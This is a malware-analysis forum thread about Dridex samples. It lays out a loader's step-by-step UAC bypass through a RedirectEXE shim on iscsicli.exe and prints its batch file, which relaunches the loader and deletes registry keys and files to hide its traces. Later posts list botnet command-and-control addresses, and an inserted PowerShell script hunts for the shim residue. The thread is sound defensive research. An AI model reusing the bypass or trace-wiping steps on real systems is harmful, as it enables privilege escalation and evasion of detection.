A forum for reverse engineering, OS internals and malware analysis 

 #24949  by r3shl4k1sh
 Wed Jan 14, 2015 8:21 pm
sysopfb wrote: md5 4bdc0b2c44041dd16e40eebc447d1fe8
Packed loader for Dridex
This downloader uses the Shim (Gootkit) method to bypass UAC.

Here's the steps it takes:
1. Creates two files in %LOCALAPPDATA%Low\ named $$$.bat and $$$.sdb (the sdb file is a RedirectEXE shim for c:\windows\system32\iscsicli.exe, which has an autoElevated manifest).
2. Registers the sdb file using sdbinst.exe.
3. Runs iscsicli.exe.
4. The target of the RedirectEXE shim will run the $$$.bat file. This file has the following content:
Code:
start C:\Users\XXXX\AppData\Local\edgE6D5.exe C:\Users\XXXX\Desktop\DRIDEX~1.EX_ 
sdbinst.exe /q /u "C:\Users\XXXX\AppData\LocalLow\$$$.sdb"
reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Custom\iscsicli.exe" /f
reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\InstalledSDB\{f48a0c57-7c48-461c-9957-ab255ddc986e}" /f
del C:\Windows\AppPatch\Custom\{f48a0c57-7c48-461c-9957-ab255ddc986e}.sdb
del %LOCALAPPDATA%Low\$$$.sdb
del %LOCALAPPDATA%Low\$$$.bat
So the bat file just runs the downloader again and deletes any traces of the shim from the system.
5. The newly created process will delete the original file and download the Dridex DLL.
6. Runs the Dridex DLL with:
Code:
rundll32.exe %FILEPATH% NotifierInit
The downloaded Dridex DLL has a very low VT detection of 1/57:
https://www.virustotal.com/en/file/bd01 ... /analysis/

Attached: unpacked downloader + the dropped files (sdb, bat) + the downloaded Dridex.
Attachments (pass: infected)
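One way to hunt for the traces this loader leaves behind (the same ones its $$$.bat tries to erase), as an added PowerShell example that is not part of the post or of the sample: it enumerates the AppCompatFlags\Custom and InstalledSDB keys and the AppPatch\Custom directory that the bat's `reg delete` and `del` lines name, flags any custom shim applied to iscsicli.exe, and looks for .sdb files that no longer have a matching InstalledSDB entry. Because the loader installs and uninstalls the database within seconds, the registry check is only a point-in-time snapshot; the last function therefore pulls sdbinst.exe process-creation events from Sysmon (Event ID 1), which is an assumption about the host's telemetry. Run it from an elevated prompt.

```powershell
# Added example, not the poster's code: hunt for residue of the sdbinst/RedirectEXE
# UAC bypass described above. Requires an elevated prompt; the Sysmon query assumes
# Sysmon is installed with process-creation logging (Event ID 1).

$AppCompat    = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags'
$CustomKey    = Join-Path $AppCompat 'Custom'        # one subkey per shimmed executable
$InstalledKey = Join-Path $AppCompat 'InstalledSDB'  # one subkey per installed database GUID
$SdbDirs      = @("$env:SystemRoot\AppPatch\Custom",            # 32-bit databases
                  "$env:SystemRoot\AppPatch\Custom\Custom64")   # 64-bit databases

# Auto-elevating binary abused in the post; extend this list with your own targets.
$AutoElevateTargets = @('iscsicli.exe')

function Get-ShimmedExecutables {
    # Every subkey under ...\AppCompatFlags\Custom is named after an executable that has
    # a custom shim applied; its values are named '{GUID}.sdb'.
    if (-not (Test-Path $CustomKey)) { return }
    Get-ChildItem $CustomKey | ForEach-Object {
        $exe   = $_.PSChildName
        $props = Get-ItemProperty -Path $_.PSPath
        $props.PSObject.Properties |
            Where-Object { $_.Name -like '{*}.sdb' } |
            ForEach-Object {
                [pscustomobject]@{
                    Executable  = $exe
                    DatabaseId  = $_.Name -replace '\.sdb$', ''
                    AutoElevate = $AutoElevateTargets -contains $exe.ToLower()
                }
            }
    }
}

function Get-InstalledShimDatabases {
    # ...\InstalledSDB\{GUID} records where sdbinst copied the database and when.
    if (-not (Test-Path $InstalledKey)) { return }
    Get-ChildItem $InstalledKey | ForEach-Object {
        $p = Get-ItemProperty -Path $_.PSPath
        $installed = $null
        if ($p.DatabaseInstallTimeStamp) {
            try { $installed = [DateTime]::FromFileTime([Int64]$p.DatabaseInstallTimeStamp) } catch { }
        }
        $exists = $false
        if ($p.DatabasePath) { $exists = Test-Path $p.DatabasePath }
        [pscustomobject]@{
            DatabaseId  = $_.PSChildName
            Description = $p.DatabaseDescription
            Path        = $p.DatabasePath
            Installed   = $installed
            FileExists  = $exists
        }
    }
}

function Get-OrphanSdbFiles {
    # .sdb files in AppPatch\Custom without an InstalledSDB entry: the key was removed by
    # hand (as the $$$.bat does with 'reg delete') or the uninstall was only partial.
    $known = @(Get-InstalledShimDatabases | ForEach-Object { $_.DatabaseId.ToLower() })
    foreach ($dir in $SdbDirs) {
        if (Test-Path $dir) {
            Get-ChildItem $dir -Filter *.sdb |
                Where-Object { $known -notcontains $_.BaseName.ToLower() }
        }
    }
}

function Get-SdbinstEvents {
    # The loader runs sdbinst.exe twice (install, then /u) within seconds, so only
    # process-creation telemetry reliably catches it. Assumes Sysmon Event ID 1.
    param([int]$Hours = 24)
    try {
        Get-WinEvent -FilterHashtable @{
            LogName   = 'Microsoft-Windows-Sysmon/Operational'
            Id        = 1
            StartTime = (Get-Date).AddHours(-$Hours)
        } -ErrorAction Stop |
        Where-Object { $_.Message -match '(?im)^Image:\s+.*\\sdbinst\.exe\s*$' } |
        ForEach-Object {
            $cmd = [regex]::Match($_.Message, '(?im)^CommandLine:\s+(.*)$').Groups[1].Value.Trim()
            [pscustomobject]@{
                Time        = $_.TimeCreated
                CommandLine = $cmd
                # A database installed from a user-writable location is the red flag here
                UserPath    = [bool]($cmd -match '(?i)\\Users\\|\\AppData\\|%(LOCAL)?APPDATA%')
            }
        }
    } catch {
        Write-Warning "Sysmon log not available: $($_.Exception.Message)"
    }
}

'== Executables with custom shims =='
Get-ShimmedExecutables | Format-Table -AutoSize
'== Installed shim databases =='
Get-InstalledShimDatabases | Format-Table -AutoSize
'== Orphan .sdb files in AppPatch\Custom =='
Get-OrphanSdbFiles | Select-Object FullName, LastWriteTime | Format-Table -AutoSize
'== sdbinst.exe launches (Sysmon, last 24h) =='
Get-SdbinstEvents | Format-Table -AutoSize
```

On a clean host all four tables are empty. Any row in the first table whose `AutoElevate` column is true, or any sdbinst.exe launch whose `UserPath` is true, deserves a look at the database file itself; a custom SDB sitting in a user profile, as in the post, is not how legitimate application-compatibility fixes get deployed.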
 #25597  by EP_X0FF
 Thu Apr 09, 2015 6:39 am
Attachments (pass: infected)
 #26095  by Xylitol
 Wed Jun 17, 2015 11:55 am
Email vector: https://www.virustotal.com/en/file/a9cb ... 434380522/
http://vxvault.net/ViriList.php?MD5=28B ... 5FE0C229EE
Code:
<config botnet="220">
   <server_list>
71.14.1.139:8443
173.230.130.172:2443
94.23.53.23:2443
176.99.6.10:8443
   </server_list>
</config>
---
Code:
Export Table
   TimeDateStamp:          0x557EF5C6  (GMT: Mon Jun 15 15:56:54 2015)
   Name:                   0x0004D25C  ("worker_x32.dll")
   Base:                   0x00000001
   NumberOfFunctions:      0x00000002
   NumberOfNames:          0x00000002
   AddressOfFunctions:     0x0004D248
   AddressOfNames:         0x0004D250
   AddressOfNameOrdinals:  0x0004D258

   Ordinal RVA        Symbol Name
   ------- ---------- ----------------------------------
   0x0001  0x0001B97A "DllRegisterServer"
   0x0002  0x00018996 "DllUnregisterServer"
Attachments (3 archives, pass: infected)
 #26104  by unixfreaxjp
 Wed Jun 17, 2015 9:38 pm
While checking a Dridex incident report, I figured out the list of live C&Cs below:
176.9.143.115 : 2443 < UP
193.13.142.11 : 8443 < Down
185.12.94.48 : 7443 < Up??
VT: https://www.virustotal.com/en/file/1ea2 ... /analysis/
Incident report: https://isc.sans.edu/diary/Botnet-based ... week/19807
Some analysis report (below); the live analysis records are in here:

The "opening" trap is interesting. I use this to recognize it.
[image]
Strings:
[image]
Traffic:
[image]
The memory trace reversing method is used; this is a snip at the usage of wininet.dll, as good as depacking.
[image]
Binary indicators (PeStudio), which may help to build sigs:
[image]

Sample is attached. #MalwareMustDie
Attachments (7z, pwd: infected)